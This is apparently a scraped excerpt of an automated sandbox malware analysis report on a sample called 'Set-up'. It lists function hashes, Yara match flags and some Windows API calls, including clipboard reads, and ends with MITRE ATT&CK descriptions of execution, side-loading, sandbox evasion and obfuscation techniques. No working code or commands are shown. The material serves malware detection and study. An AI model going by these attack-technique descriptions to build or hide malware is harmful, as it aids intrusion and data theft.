Instruction Fuzzy Hash: 8611C633B091D54EC316DD3C8500566BFA30B93238B598399F4B49B6E2DB278D8A9764

Function 01EFB73E Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
Instruction ID: a42e72e7935744ffcfd56d384f88c5d63bf39094573421505d27ec3479b7c3b3
Opcode Fuzzy Hash: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
Instruction Fuzzy Hash: 0C01D4F170134257E760AF58C8C073FB6A96F90608F1D622CDE454B281DB76E80587A1

Function 09179F80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
Instruction ID: b270f7098f260ab6396a2842005bb4af619def0b07b444a7680b9f0216cd71b3
Opcode Fuzzy Hash: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
Instruction Fuzzy Hash: C80175F1F0070247F720AE64A8C1B2BF7B86F8561CF19992DE81557245EB75E809C691

Function 01F0D05E Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754b1fdeed7a772bc9ce9a585551eee55588dd48648c9e799ac489748c070118
Instruction ID: 1c650989cf9b70050fa0d7751f04f43a89606c2ff835e3767342ca047bfd0103
Opcode Fuzzy Hash: 754b1fdeed7a772bc9ce9a585551eee55588dd48648c9e799ac489748c070118
Instruction Fuzzy Hash: D71106755083049BD211EBA8DC4486BB7A9FBD9394F140428E58C57264E6739911D751

Function 0918B8A0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23575d74a5e93fad401c725bd361aa9e9c6939206c17115220d702293650ea2f
Instruction ID: 83e484d70763f6a45e8c30c0240a2d2a758d16edfcab945730e9ded6d29c0ebc
Opcode Fuzzy Hash: 23575d74a5e93fad401c725bd361aa9e9c6939206c17115220d702293650ea2f
Instruction Fuzzy Hash: 2B11C275A49308AFC211BE14D84487BB7AAFFD935DF05182CE58457220E332A960DF52

Function 01EDBA64 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
Instruction ID: deaa4d1e02ca2c7465068d55e6457af0e64c6d6e9a8f1ae45e28e6e6c38237c0
Opcode Fuzzy Hash: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
Instruction Fuzzy Hash: 03113430E543408BE7348F6A841127ABBE1AF8321572AD92CC5D3DB309EB349842CF44

Function 0915A2A6 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec35446e43309827baa9a14913f9923cbfb977d1b28e0432f8b9dc763261881e
Instruction ID: 584ca3c9b39177cee9d02d2b822b855e81036a27a6b364d7947d35aed98ea841
Opcode Fuzzy Hash: ec35446e43309827baa9a14913f9923cbfb977d1b28e0432f8b9dc763261881e
Instruction Fuzzy Hash: 41112630F98391CBD7788F6A8011232B7E5AF8231872ECA1D98E397344DB349442CB84

Function 01EF64C2 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d668db2a39d0c58336a571a08f283b7c17e072167910f4d6009b41effca224b
Instruction ID: 9492b6a64ca8fb8d8acec8d65df9576d7df2e7499d4fd387426980743363e047
Opcode Fuzzy Hash: 3d668db2a39d0c58336a571a08f283b7c17e072167910f4d6009b41effca224b
Instruction Fuzzy Hash: 5001D4A0624422A6D72D9F38D51547AB6A3FF99300754BA3E8182D3AA9EF3886248344

Function 09174D04 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e05d8f287b360e0888fdc83ed961c6cf707d7c85f068e88e6961abb8c8327d4d
Instruction ID: 21444704636abb3b024448297e0a1ba2995e5951b9dd5715f19e94bdbfad25b2
Opcode Fuzzy Hash: e05d8f287b360e0888fdc83ed961c6cf707d7c85f068e88e6961abb8c8327d4d
Instruction Fuzzy Hash: 860188A0714512A6D72DDF38D52547AB6A3FFD8300B24A63E8182C3AA5EF3856248755

Function 01EF774C Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8473c85886807e6bc29514394763af4b2039333101efc46837769cd7ff94ce77
Instruction ID: 1bc89543e165fad1869ed6eed16b89e169b415539f1812d9614f6ee895e31041
Opcode Fuzzy Hash: 8473c85886807e6bc29514394763af4b2039333101efc46837769cd7ff94ce77
Instruction Fuzzy Hash: E001D235E192208BE725CF28C90067FB3E1AB99705F12693CEE49A72A1C371DC01CB89

Function 09175F8E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e982c87ffb89c465d5bcd61adb56ca9336caf97f0467d068ad1af35745d9bad
Instruction ID: 77baa6d7906c21035f7ce2d9906caef4095cfeb72e22c5a0075d3649fdb78d69
Opcode Fuzzy Hash: 4e982c87ffb89c465d5bcd61adb56ca9336caf97f0467d068ad1af35745d9bad
Instruction Fuzzy Hash: 09018031B063159FE7298F14C54073AB3F2BB59B48F42592CF88AA7254D3319C508B86

Function 01EFB1F3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479373be1e121a7faa6e3bd242e7a90329f0f24191153999f53bc99e68dfe5f2
Instruction ID: a232e29a627fc482a8a0e82f2320cd2dfdec830f21fa89b9e97a8982c51d72cb
Opcode Fuzzy Hash: 479373be1e121a7faa6e3bd242e7a90329f0f24191153999f53bc99e68dfe5f2
Instruction Fuzzy Hash: 9E11A335E193209FE7258F14C8817BEB3A1FF89704F41A52CEE862B662D3729C018786

Function 09179A39 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173b480d1c53688e4a7a461e0df70a921dbea726912749b976b42af5ee216f6d
Instruction ID: 74c1cd2e7e176d277d826332433ae34767640464b2cb298d0c70076f4c753af5
Opcode Fuzzy Hash: 173b480d1c53688e4a7a461e0df70a921dbea726912749b976b42af5ee216f6d
Instruction Fuzzy Hash: F5110231F293259FE7258F10D581B7AF3B1FB88704F41952CED8A27251D376AC448786

Function 01EF774E Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a988fe037fd612b4c48d6a54066d194f5add051878c06eb8d1dc27ab7f058bd
Instruction ID: ab6aafdce3ec0449b9c5225bf40a604492033d2fd3f5b5f8630c5e1764e5ff17
Opcode Fuzzy Hash: 3a988fe037fd612b4c48d6a54066d194f5add051878c06eb8d1dc27ab7f058bd
Instruction Fuzzy Hash: 60118B35D283208BD724CF28C90027BB3E0BF89706F52652DED89AB290D7749905C789

Function 09175F90 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f98cdc95911e14108e8f21361eeca8134eb1fb928635ad2636f3f9345da0283
Instruction ID: 12b316eb15bd6a8fdab328863aa1e5687d0d7cf11fd5b199913a202f362126da
Opcode Fuzzy Hash: 2f98cdc95911e14108e8f21361eeca8134eb1fb928635ad2636f3f9345da0283
Instruction Fuzzy Hash: 2311CB31A153218BD7288F24C40033BB3F0BF89B49F42691CF88AA7244E335CD40C78A

Function 01F10281 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e0eb08d5b3252200ba858cb0dbd191acbb107141d47f76ae1cf0deae4e99271
Instruction ID: 882ae848c1d5752c13364f4e6da699b82f8af461e210370a5b7a12a9e4d2d64a
Opcode Fuzzy Hash: 7e0eb08d5b3252200ba858cb0dbd191acbb107141d47f76ae1cf0deae4e99271
Instruction Fuzzy Hash: F6012136A187158FC750AF28DC103EAB3E0AB84320F0A543D9AD5E3761FB78EC409284

Function 0918EAC3 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb1e98a03a701c9a157157a1493bcd4b07d7d9e5d9dabd95557af458b1c8536
Instruction ID: eac556b3aa81ff740b54de639029331008a8635df78a136f7a43a59e851e94f7
Opcode Fuzzy Hash: feb1e98a03a701c9a157157a1493bcd4b07d7d9e5d9dabd95557af458b1c8536
Instruction Fuzzy Hash: 37012136B187198FC750AF28DC013EAB3E0AB84310F0A543D9AE6E3751FB78E8409681

Function 01F0E5AE Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
Instruction ID: f74d8f23b6f846d46f4c08cb90195b22e7c6f0a4938be46d297812daba3d42ab
Opcode Fuzzy Hash: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
Instruction Fuzzy Hash: 7601D636D15A644BD319CF38CC1039673E6ABC6305F098538DA45E7798EB7A98508684

Function 0918CDF0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88dd9fa84a3554f015be5f21a6c0641dbe8e1d76d2beeb8622950575e3cefb6
Instruction ID: ac086a06aa5e8389537ce66a9521c6384b12fe2eeae21a13a3f240fc91bdb85d
Opcode Fuzzy Hash: c88dd9fa84a3554f015be5f21a6c0641dbe8e1d76d2beeb8622950575e3cefb6
Instruction Fuzzy Hash: 7401D632E166604BD319CE38D91039677E6AB86305F098538DA45E7798D77A989086C1

Function 0917C7DD Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b60d66308c85badd7495518bd48d82bfaa2ddfeec39f5e85c37d2e158e358b4
Instruction ID: 351a78dc7d8b4a9d36d975360b72494e8896ddd5dbe3d06a671f30969fc72f67
Opcode Fuzzy Hash: 2b60d66308c85badd7495518bd48d82bfaa2ddfeec39f5e85c37d2e158e358b4
Instruction Fuzzy Hash: DAF0E225A897C386D31A8B3D8070331FFE14FAB254B2C919CD8E2573C3DB26840A9790

Function 01ED0CB1 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 03b3114d0fc92900ce73696fb6e60741c1ddb351b619caadc76e2ffd81c4211e
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 3E01B634A01108EFCB19DF98C284AADFBB5FB48314F749599E8059B381D731AF42DB91

Function 01F10019 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c64a27492023317bfe340e89d84a1a068089ead8bdec49ccc3fa352ce3cf3e
Instruction ID: 16bca9d9ef67dab11204ea6616041648098c1bfcbadcf815da32973812f0ee6c
Opcode Fuzzy Hash: 41c64a27492023317bfe340e89d84a1a068089ead8bdec49ccc3fa352ce3cf3e
Instruction Fuzzy Hash: 33F0A736AD6B168ED3506F28D8002B5F3A2AFC2305F0A6438D8C813292DEB96585D385

Function 01EF6561 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb2be1f52fb94bbc8aa53112f6c7e48271192bd10a980babc9053e326529e98
Instruction ID: 0ea179fffb294a1c9370ee063ae1ec057a33889e9f1590674396bf32b5f05a6f
Opcode Fuzzy Hash: 7bb2be1f52fb94bbc8aa53112f6c7e48271192bd10a980babc9053e326529e98
Instruction Fuzzy Hash: 54F0A737D415304BE710CA18CD1039573A19FCA311F07A570CC4DBB69AD57A5C058780

Function 01F0FFF5 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fadea260efd188fa37194c97d808d0f8342bb959896949141ba2e03d0f00f63
Instruction ID: de2533c64f91a27f6dd73bf0d1f85fabef093f0a8130a6d56f25c7e3812cc0d2
Opcode Fuzzy Hash: 4fadea260efd188fa37194c97d808d0f8342bb959896949141ba2e03d0f00f63
Instruction Fuzzy Hash: 01F0EC369D6B2ACAD3502F38D8003B5F3A1AFC2305F0A6438D8C813291DDBA6585D385

Function 0918E837 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b15e16a38fd4aefbb305dc4ae15d900224eaa30dafe90e2ee47c9c0e075d33d7
Instruction ID: ceadf9caca0213bdabb179dff305c44ccf9c81cb1879ad34f617a006a452cd91
Opcode Fuzzy Hash: b15e16a38fd4aefbb305dc4ae15d900224eaa30dafe90e2ee47c9c0e075d33d7
Instruction Fuzzy Hash: D2F0EC32AD6B298AD3503F34DC003B6F3A1AFC3305F0A643998C813291DAB9654597C5

Function 09174DA8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0f092771c9e28cd9c696639dc4f960802c24b3b7c071208c3e4132c0ffd1de
Instruction ID: 080cb6db7518f89022b2260df56ada5bfc68b9dde6fc57e5f62c1b3349eb7dc4
Opcode Fuzzy Hash: 9d0f092771c9e28cd9c696639dc4f960802c24b3b7c071208c3e4132c0ffd1de
Instruction Fuzzy Hash: 3AF03033E519304BEB108A18C96039573F29FDA315F0695B1CC49BB69ADA7A5C0187C1

Function 01EDBCF1 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684

Function 0915A533 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684

Function 01EDBCA5 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7801a348dfb445b8529d839e4b4c2f9d4d14aedce63be36fe840cd4680e2497
Instruction ID: e3989d077634a48908df7aa544cddc51b682a82f7388479aad2c488c47eab6c3
Opcode Fuzzy Hash: a7801a348dfb445b8529d839e4b4c2f9d4d14aedce63be36fe840cd4680e2497
Instruction Fuzzy Hash: 79D01235E553428FDB05CF68E4C177BB7719B5B204F58582CC152F3352C220E416861C

Function 0915A4E7 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f772af8a57736c98821321b73bcf6f40c436ad74d8f91bce2c855b7ec0f2bf
Instruction ID: 4ca60b952128d6eed2bde7c44cd8155513961bc4808a64b244c6884a48f6d365
Opcode Fuzzy Hash: 98f772af8a57736c98821321b73bcf6f40c436ad74d8f91bce2c855b7ec0f2bf
Instruction Fuzzy Hash: 9ED01235F953868FDB05CE68E4D177BB7759B1B204F58582CC152E3352C220E456861C

Function 091822E0 Relevance: 9.1, APIs: 6, Instructions: 104clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 091822F0
GetClipboardData.USER32 ref: 0918230B
GlobalLock.KERNEL32 ref: 0918232A
CloseClipboard.USER32 ref: 0918243D

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: 5a4d98bdaa54644d3f542823b4e8c087a4251cdfc0b94b8ebbfb370c980c68b5
Instruction ID: ed9cfcacdc5ff8ecaa3f694262b63b6c4b1455b198b9c5dcfa70ac89bd317d8e
Opcode Fuzzy Hash: 5a4d98bdaa54644d3f542823b4e8c087a4251cdfc0b94b8ebbfb370c980c68b5
Instruction Fuzzy Hash: 05317C71608351CFD302BF68948936FBBE0EF84394F025C2DE8E686214D77985899B53

Function 0917349F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 149COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 09173561
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0917365E

Strings

tfff, xrefs: 091735BD
afrf, xrefs: 091735CB
dfkf, xrefs: 091735B6

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: afrf$dfkf$tfff
API String ID: 237503144-335445692
Opcode ID: 48c9c1c0344b4d3ab1b029267be7c538603e8bd63b10d46fa98de8bc2414eaa0
Instruction ID: 62b98ec02db77b73d22f3bc1e6504560a822521129d24cb429448be6fb7f7d81
Opcode Fuzzy Hash: 48c9c1c0344b4d3ab1b029267be7c538603e8bd63b10d46fa98de8bc2414eaa0
Instruction Fuzzy Hash: 4D51ADB1D003149FDB14CF9AD982B9ABBB4FB84310F15816DE904AF399C7758942CBE6

Function 091784C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 09178577

Strings

S%1e, xrefs: 09178590
B]V], xrefs: 091784E2
B]C], xrefs: 091784D2
S%1e, xrefs: 09178500, 09178546

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: B]C]$B]V]$S%1e$S%1e
API String ID: 237503144-91396555
Opcode ID: 487dd5e40d09fc3ebe1c1cf39708d283eb10131259ebd3a2710daa30a19224c0
Instruction ID: fe9a36278a455abac644b3073d1ad0f23c57edf0dc3865a2cb97e9585775a5d4
Opcode Fuzzy Hash: 487dd5e40d09fc3ebe1c1cf39708d283eb10131259ebd3a2710daa30a19224c0
Instruction Fuzzy Hash: 28210272A0C3159FE328CF25D8557ABF2E7EBC4704F11C83DA58A9B2C1DAB084468796

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

